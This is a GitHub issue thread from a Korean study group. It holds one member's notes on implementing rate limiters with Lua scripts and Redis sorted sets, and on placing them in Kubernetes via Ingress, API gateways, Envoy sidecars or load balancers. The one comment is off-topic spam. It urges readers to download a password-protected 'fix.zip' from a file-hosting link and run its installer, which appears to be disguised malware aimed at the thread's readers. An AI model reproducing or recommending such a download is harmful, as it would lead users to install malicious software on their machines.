### ISSUE TITLE
배수빈: 4장

### ISSUE THREAD

**Issue by baexxbin** [baexxbin/TechBookStudy#13]
* 분산환경에서의 처리율 제한 장치 구현
   * Lua 스크립트
      - 가볍고 빠른 스크립트 언어
      - 명령을 원자적으로 실행하여 복잡한 명령을 단일 명령처럼 처리
   * 정렬 집합
      - 레디스의 자료구조중 하나
      - 각 원소가 점수(score)를 가지고 있으며 이 점수에 따라 원소들이 정렬
      - 특정 키에 대한 처리율 효율적 제한

<br>

* 쿠버네티스 환경에서 처리율 제한 장치 설정 방법
   - Ingress Controller (`서버 측`)
      - 쿠버네티스 클러스터에서 외부 요청을 내부 서비스로 라우팅하는 역할
  - API Gateway (`미들웨어 측`)
  - Custom Sidecar Proxy
     - ex) 사이드 카 패턴으로 Envoy 프록시 설정
  - 외부 로드밸런서 (`미들웨어 측`)
    - ex) NLB, ALB

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
